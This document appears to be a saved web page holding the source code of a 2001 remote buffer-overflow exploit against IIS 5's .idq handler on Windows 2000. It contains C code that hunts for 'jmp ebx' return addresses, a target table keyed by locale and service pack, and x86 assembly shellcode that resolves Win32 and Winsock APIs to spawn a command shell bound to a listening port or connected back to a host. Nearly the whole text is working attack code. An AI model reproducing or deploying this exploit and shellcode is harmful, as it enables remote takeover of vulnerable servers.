📄 snake的iis5_idq命令行溢出程序源代码.htm
lpsz = &( szCreateCode[dwExecCommand_Offset]);
memcpy( lpsz, szExecTemp, wExecCommandSize);
strcat( szOutput, szCreateCode);
strcat( szOutput, "\r\n\r\n");
strcpy( pszOutput, szOutput);
return strlen( pszOutput);
}
// Collect the addresses this tool reports: two kernel32 exports plus every
// "jmp ebx" word found in user32's image, formatted as a short text report.
// szInfo:   output buffer; always NUL-terminated on return
// iMaxSize: size of szInfo in bytes; the report is truncated to fit
// Presumably consumed when choosing the per-build constants for one
// SYSTEM_TYPE entry (SkShellCodeFunc.h) -- confirm against the caller, which
// is not part of this listing.
void GetNecesProcAddr( char *szInfo, int iMaxSize)
{
HANDLE hModule = GetModuleHandle("kernel32");
DWORD dwAddr_GetHandle, dwAddr_GetProcAddr;
char szOutput[11024], szJmpAddr[8124], szOne[20];
DWORD dwJmpEbx[100];
WORD wGetJmpCount,w;
// at most 100 matches are recorded; see Search_Jump_Ebx_Code below
wGetJmpCount = Search_Jump_Ebx_Code(dwJmpEbx, 100);
szJmpAddr[0] = 0;
// one " 0xXXXXXXXX" token per match (at most 11 chars, fits szOne)
for( w=0; w<wGetJmpCount; w++){
wsprintf( szOne," 0x%X", dwJmpEbx[w]);
strcat( szJmpAddr, szOne);
}
dwAddr_GetHandle = (DWORD)GetProcAddress( (HINSTANCE)hModule,"GetModuleHandleA");
dwAddr_GetProcAddr = (DWORD)GetProcAddress( (HINSTANCE)hModule, "GetProcAddress");
// NOTE(review): wsprintf writes at most 1024 characters; with close to 100
// matches the "JJ:" list alone exceeds that, so the report may be cut short.
wsprintf( szOutput,"Addr1: 0x%X; Addr2: 0x%X\r\nJJ:%s",
dwAddr_GetHandle, dwAddr_GetProcAddr, szJmpAddr);
//MessageBox( NULL, szOutput, "topic", MB_OK);
// strncpy does not terminate on truncation, hence the explicit NUL below
strncpy( szInfo, szOutput, iMaxSize);
szInfo[iMaxSize-1] = 0;
}
// 0xe3ff is the little-endian 16-bit view of the opcode bytes FF E3 ("jmp ebx").
#define JUMP_EBX_CODE 0xe3ff
// Scan memory starting at user32's base for the "jmp ebx" word and record
// every address where it occurs.
// dwArray:   receives up to wMaxCount addresses
// wMaxCount: capacity of dwArray
// Returns the number of entries written.
WORD Search_Jump_Ebx_Code(DWORD *dwArray, WORD wMaxCount)
{
HANDLE hDllModule = GetModuleHandle("user32");
char *pValue;
WORD wTemp = JUMP_EBX_CODE; // assigned but never read
DWORD dwMin = (DWORD)hDllModule,dwMax;
WORD wCount = 0;
pValue = (char*)dwMin;
wCount = 0;
// Fixed window of 400000 bytes (about 390 KB; the original note said "39kb").
// It is not derived from the module's real image size, so the scan may read
// past the mapped image.
dwMax = dwMin + 400000; // end of the scan window
// Byte-stride scan: compare the (unaligned) 16-bit word at every offset.
while( ( (DWORD)pValue) < dwMax){
if( *((WORD *)pValue) == JUMP_EBX_CODE){
dwArray[wCount++] = (DWORD)pValue;
if( wCount >= wMaxCount) break; // never exceed the caller's capacity
}
pValue++;
}
return wCount;
}
文件3. SkShellCodeFunc.h -- 必须的头文件
//SkShellCodeFunc.h
////////////////////////////////////////////////////////////////////////////////
// header file for 定义shellcode 函数
////////////////////////////////////////////////////////////////////////////////
// start by snake. 2001/7/11
////////////////////////////////////////////////////////////////////////////////
#ifndef _SNAKE_SHELLCODE_FUNC_HEADER_2001_7_11
#define _SNAKE_SHELLCODE_FUNC_HEADER_2001_7_11
// Target matrix: Windows 2000 / IIS 5 by locale and service pack. The
// host-side tool presumably keys its per-build address constants on this
// value (confirm in the .cpp, not shown here). MAX_SYSTEM_TYPE_NUM is a
// count sentinel, not a target.
enum SYSTEM_TYPE{
IIS5_WIN2K_CHINESE_SP0,
IIS5_WIN2K_CHINESE_SP1,
IIS5_WIN2K_CHINESE_SP2,
IIS5_WIN2K_ENGLISH_SP0,
IIS5_WIN2K_ENGLISH_SP1,
IIS5_WIN2K_ENGLISH_SP2,
IIS5_WIN2K_JAPANESE_SP0,
IIS5_WIN2K_JAPANESE_SP1,
IIS5_WIN2K_JAPANESE_SP2,
IIS_WIN2K_MEXICO_SP0,
IIS_WIN2K_MEXICO_SP1,
IIS_WIN2K_MEXICO_SP2,
MAX_SYSTEM_TYPE_NUM,
};
// Channel mode for the payload: listen on a local port, or connect out to a
// host. The numeric values (1 = listen, 2 = connect) match the byConnectType
// comment in iis_idq.asm.
enum Sk_ConnectType{ CONNECTTYPE_NONE=0, LISTEN_ON_PORT=1, CONNECT_TO_HOST, MAX_CONNECT_TYPE};
// Host-side connection parameters. Presumably byConnectType holds an
// Sk_ConnectType value. NOTE(review): this is not the same layout as
// stConnectInfo in iis_idq.asm, which stores each 16-bit field expanded to a
// dword -- TODO confirm where one is translated into the other.
typedef struct _ConnectStruct{
BYTE byConnectType;
WORD wListenPort;
DWORD dwConnectIP;
WORD wConnectPort;
}ConnectStruct;
// Returns a display name for a SYSTEM_TYPE entry.
LPCTSTR GetSystemName( SYSTEM_TYPE type);
#endif //_SNAKE_SHELLCODE_FUNC_HEADER_2001_7_11
文件4.iis_idq.asm --shellcode的汇编代码(编译不需要)
;//IIS5_idq.asm
.386p
.model flat,c
; Connection parameters as laid out inside the payload. Each 16-bit value is
; carried expanded: every byte is stored as a 16-bit pair, high byte = type,
; low byte = value. _convert_Sk_Long_To_Ansi_Word decodes a pair as
;   type 1  -> value byte used as-is
;   other   -> value byte minus one (the original note reads "low = value-1")
stConnectInfo struct
byConnectType db 0 ; =1 listen on a port; =2 connect out to ip/port
byReserv1 db 1 ; padding only, keeps the next field word-aligned
dwReserv1 dw 1 ; padding only, keeps the next field dword-aligned
dwListenPort dd 0 ; listen port, encoded as described above
dwIP1 dd 0 ; IP address, first half (dwIP1+dwIP2 form the address), encoded
dwIP2 dd 0 ; IP address, second half, encoded
dwConnectPort dd 0 ; connect-to port, encoded
stConnectInfo ends
; Table of resolved API entry points. _Get_Overflow_Addr_From_Shell_Func
; fills it one dword at a time, in the order the names appear in
; szShellNeedFunc; there is no lookup by name, so this field order and that
; list order must agree exactly.
; From a detection standpoint this is the complete API set of a pipe-backed
; command shell bridged to a socket: CreatePipe/CreateProcessA/PeekNamedPipe
; together with socket/bind/listen/accept or connect.
SkOverflowFuncAddr struct
TerminateProcess dd 0;
CreatePipe dd 0;
GetStartupInfoA dd 0;
CreateProcessA dd 0;
PeekNamedPipe dd 0;
GlobalAlloc dd 0;
WriteFile dd 0;
ReadFile dd 0;
Sleep dd 0;
ExitProcess dd 0;
GetLastError dd 0;
DuplicateHandle dd 0;
GetCurrentProcess dd 0;
CloseHandle dd 0;
socket dd 0;
bind dd 0;
listen dd 0;
accept dd 0;
send dd 0;
recv dd 0;
setsockopt dd 0;
WSAStartup dd 0;
closesocket dd 0;
connect dd 0;
gethostname dd 0;
SkOverflowFuncAddr ends
; Local mirror of the Win32 STARTUPINFOA layout (68 bytes). Win32 expects cb
; to hold the structure size before it is handed to CreateProcessA.
STARTUPINFO struct
cb dd 0;
lpReserved dd 0;
lpDesktop dd 0;
lpTitle dd 0;
dwX dd 0;
dwY dd 0;
dwXSize dd 0;
dwYSize dd 0;
dwXCountChars dd 0;
dwYCountChars dd 0;
dwFillAttribute dd 0;
dwFlags dd 0;
wShowWindow dw 0;
cbReserved2 dw 0;
lpReserved2 dd 0;
hStdInput dd 0;
hStdOutput dd 0;
hStdError dd 0;
STARTUPINFO ends
; Local mirror of the Win32 PROCESS_INFORMATION layout (16 bytes), filled by
; CreateProcessA.
PROCESS_INFORMATION struct
hProcess dd 0;
hThread dd 0;
dwProcessId dd 0;
dwThreadId dd 0;
PROCESS_INFORMATION ends;
; Socket / command-interaction state: the two pipe pairs (field names suggest
; one for the child's stdout, one for its stdin), the socket, and the records
; of the spawned process.
Shell_Cmd_Pipe struct
hReadPipe dd 0;
ShellStdoutPipe dd 0;
hWritePipe dd 0;
ShellStdinPipe dd 0;
msocket dd 0;
ProcessInformation PROCESS_INFORMATION <>;
nstartupinfo STARTUPINFO <>;
Shell_Cmd_Pipe ends
; 0f0h = 240 bytes of scratch space per transfer.
SIZE_OF_TEMP_BUFFER equ 0f0h
; State for copying data between the socket and the pipes. dwBreak and dwTemp
; are only named here; their use is outside this listing.
Recv_Write_Socket_Pipe_Data struct
szTemp db SIZE_OF_TEMP_BUFFER dup(0)
dwBreak DD 0
dwTemp DD 0
Recv_Write_Socket_Pipe_Data ends;
; Local mirror of the Winsock sockaddr_in layout (16 bytes).
SOCKADDR_IN struct
sin_family dw 0;
sin_port dw 0;
sin_addr dd 0;
sin_zero db 8 dup(0);
SOCKADDR_IN ends
; Local mirror of the Win32 SECURITY_ATTRIBUTES layout (12 bytes); used for
; the CreatePipe handles (bInheritHandle decides whether the child sees them).
SECURITY_ATTRIBUTES struct
nLength DD 0;
lpSecurityDescriptor DD 0;
bInheritHandle DD 0;
SECURITY_ATTRIBUTES ends;
; Stack-argument accessors for the internal routines below. After the
; "push ebp / mov ebp,esp" prologue, [ebp+4] is the return address and
; [ebp+8] is the first stack argument; each further argument is 4 bytes up.
FUNC_PARAM_1 equ [ebp+8]
FUNC_PARAM_2 equ [ebp+0ch]
FUNC_PARAM_3 equ [ebp+10h]
FUNC_PARAM_4 equ [ebp+14h]
FUNC_PARAM_5 equ [ebp+18h]
FUNC_PARAM_6 equ [ebp+1ch]
FUNC_PARAM_7 equ [ebp+20h]
; Winsock option constants (values as in winsock.h)
SO_RCVTIMEO equ 1006h ; receive timeout
SOL_SOCKET equ 0ffffh ; options for socket level
; Offsets of the working structures. Presumably measured within the 0x800-byte
; frame that _sk_Bind_ConnectShellCode reserves on entry -- confirm against the
; uses, which fall past the end of this listing.
Shell_Cmd_Pipe_OFFSET equ 3f0h
SkOverflowFuncAddr_OFFSET equ 2d0h
szShellNeedFunc_OFFSET equ 1d0h
.code
public _sk_Bind_ConnectShellCode
public _GetDataSetOffset_Value
start:
_sk_Bind_ConnectShellCode proc
push ebp;
mov ebp, esp;
;//产生 0x800的堆栈 空间.
xor eax,eax;
inc eax;
shl eax, 0bh; //=>0x800
sub esp, eax;
jmp call_back;
nop;
jump_next:
jmp run_actual1;
call_back:
call jump_next;
call_back_Data_Offset:
;//jmp quit_return; //not run here as no necessary.
;//(void *ptr, int iLen, DWORD dwOld, DWORD dwNew)
; Replace every byte equal to dwOld (al) with dwNew (dl) in the iLen bytes at
; ptr. The name suggests it restores NUL bytes that were carried as '+' in the
; delivered payload -- confirm at the call site, which is not in this listing.
; Preserves edi, ecx, eax, edx; flags are clobbered.
_Convert_Add_Sign_To_Null_Sign:
push ebp;
mov ebp, esp;
push edi;
push ecx;
push eax;
push edx;
mov edi, FUNC_PARAM_1; // arg1: ptr, used as the scan cursor
mov ecx, FUNC_PARAM_2; // arg2: iLen, bytes remaining
mov eax, FUNC_PARAM_3; // arg3: dwOld; only al is compared by scasb
mov edx, FUNC_PARAM_4; // arg4: dwNew; only dl is written
; Scan for al. On a hit edi is one past the match and ecx has already been
; decremented for it, so step back, overwrite, and give that byte back to
; the count before rescanning from the same position. Note that jcxz tests
; cx (16 bits), not ecx.
NextAddSign:
repnz scasb;
jcxz Finish_Replace_Add_Sign;
dec edi;
mov byte ptr [edi], dl;
inc ecx;
jmp NextAddSign;
Finish_Replace_Add_Sign:
pop edx;
pop eax;
pop ecx;
pop edi;
pop ebp;
ret;
; Decode the two encoded halves of eax into a plain 16-bit value in ax.
; In:  eax = high half (bits 31..16) and low half (bits 15..0), each encoded
;      as (type byte << 8) | value byte, as described for stConnectInfo.
; Out: ax = (decoded high half << 8) | decoded low half. Bits 31..16 of eax
;      are left holding shifted leftovers of the input; use only ax.
; Rule per half: type byte 1 -> value as-is; anything else -> value - 1.
; Preserves ebx, ecx, edx; flags are clobbered.
_convert_Sk_Long_To_Ansi_Word:
push ebx;
push ecx;
push edx;
xor edx, edx; // pass counter: 0 = high half, 1 = low half
push eax; // ebx = eax >> 16, the high half
pop ebx;
shr ebx, 10h;
push eax; // ecx = eax; its low 16 bits are the low half
pop ecx;
_Convert_bx_To_al_Short:
; decode the half currently in bx into al
cmp bh, 1;
je _convert_Sk_Long_IsNormal;
dec bl;
_convert_Sk_Long_IsNormal:
mov al, bl;
test edx, edx;
jnz Finish_Convert_Next_Bit;
shl eax, 8; // first result moves up into ah
push ecx; // second pass: bx = low half
pop ebx;
inc edx;
jmp _Convert_bx_To_al_Short
Finish_Convert_Next_Bit:
pop edx;
pop ecx;
pop ebx;
ret;
run_actual1:
jmp run_actual2;
; Fill the SkOverflowFuncAddr table from the packed name list in szShellNeedFunc.
;//void _Get_Overflow_Addr_From_Shell_Func( void *SkOverflowFuncAddr,
;// char *ShellNeedFuncStr,
;// DWORD dwGetModuleHandleAddr,
;// DWORD dwGetProcAddr)
; List format, as read below, starting at
; ShellNeedFuncStr + SHELL_NEED_FUNC_BODY_OFFSET (constant not defined in
; this listing):
;   byte nDlls; per DLL: byte len, name, byte nFuncs, then per function:
;   byte len, name. The name pointer is passed straight to the API, so len
;   presumably counts the terminating NUL -- confirm against the list builder.
; Each GetProcAddress result is stored at the next dword of the output table,
; in list order; neither API result is checked for NULL. GetModuleHandleA
; (not LoadLibrary) is used, so every listed DLL must already be loaded in
; the hosting process. The two API addresses arrive as absolute values from
; the caller, which is what ties the payload to one exact OS build.
; Preserves esi, edi, edx, ecx, ebx, eax; flags are clobbered.
;
_Get_Overflow_Addr_From_Shell_Func:
push ebp;
mov ebp, esp;
push esi;
push edi;
push edx;
push ecx;
push ebx;
push eax;
mov edi, FUNC_PARAM_1; // arg1: output table cursor
mov esi, FUNC_PARAM_2; // arg2: packed name list
xor ebx,ebx;
xor ecx,ecx;
mov cl,SHELL_NEED_FUNC_BODY_OFFSET;
add esi, ecx; //esi = szShellCodeNeedFunc+SHELL_NEED_FUNC_BODY_OFFSET
mov cl, byte ptr [esi]; // cl = number of DLL entries
inc esi;
_NextDllNameToLoad:
push ecx; // outer loop counter survives the calls below
mov bl, byte ptr [esi]; // bl = length of the DLL name
inc esi; //skip size.
push esi; // GetModuleHandleA(name)
mov eax, FUNC_PARAM_3; // arg3: address of GetModuleHandleA
;//mov eax, GetModuleHandleA_Addr; //GetModuleHandleA
call eax; // eax = module handle (not checked)
add esi, ebx; //go to next address.
; esi now points at this DLL's function count
xor ecx, ecx;
mov cl, byte ptr [esi];
inc esi;
; resolve each function of this DLL
_NextFunction_Addr:
push ecx; // inner loop counter
mov bl, byte ptr [esi]; // bl = length of the function name
inc esi;
push eax; // keep the module handle across the call
push esi; // keep the name pointer; advanced by len after the call
push esi; //procName
push eax; //module
mov ecx, FUNC_PARAM_4; // arg4: address of GetProcAddress
;//mov eax, GetModuleHandleA_Addr; //GetModuleHandleA
call ecx;
mov dword ptr [edi], eax; // store the resolved address (not checked)
add edi, 4;
pop esi;
pop eax;
add esi, ebx; // advance past this name
pop ecx;
loop _NextFunction_Addr;
pop ecx;
loop _NextDllNameToLoad;
pop eax;
pop ebx;
pop ecx;
pop edx;
pop edi;
pop esi;
pop ebp;
ret;
run_actual2:
jmp run_actual3_1;
;//创建 一个管套,监听一个端口,返回该管套.
;//SOCKET _Create_Bind_Connect_Socket_To_Port( SkOverflowFuncAddr *pFuncAddr, szShellNeedFunc *pNeedFunc);
_Create_Bind_Connect_Socket_To_Port:
push ebp;
mov ebp, esp;
xor eax, eax; //开辟0xff(256)个byte的变量区域.
mov ax, 3f0h
sub esp, eax;
push esi;
push edi;
push edx;
push ecx;
push ebx;
mov esi, FUNC_PARAM_1; //第一个参数.
;//WSAStartup(werd,&wsd);
lea edi, [ebp-340h]; //开辟个空间做临时变量.
xor eax, eax;
mov al,2;
push edi;
push eax;
mov eax, [esi+SkOverflowFuncAddr.WSAStartup];
call eax;
;//msocket = socket( AF_INET, SOCK_STREAM, 0); = (2,1,0)
xor eax, eax;
push eax;
inc eax;
push eax;
inc eax;
push eax;
mov eax, [esi+SkOverflowFuncAddr.socket];
call eax;
;//取连结类型
mov edx, FUNC_PARAM_2;
lea ebx, [edx+stConnectInfo.byConnectType];
mov cl, BYTE PTR [ebx];
push eax;
;//准备参数 SOCKADDR_IN
lea edi, [ebp-0f0h]; //现在是sockaddr_in的地址.
lea ebx, [edi + SOCKADDR_IN.sin_family];
xor eax, eax;
mov al,2;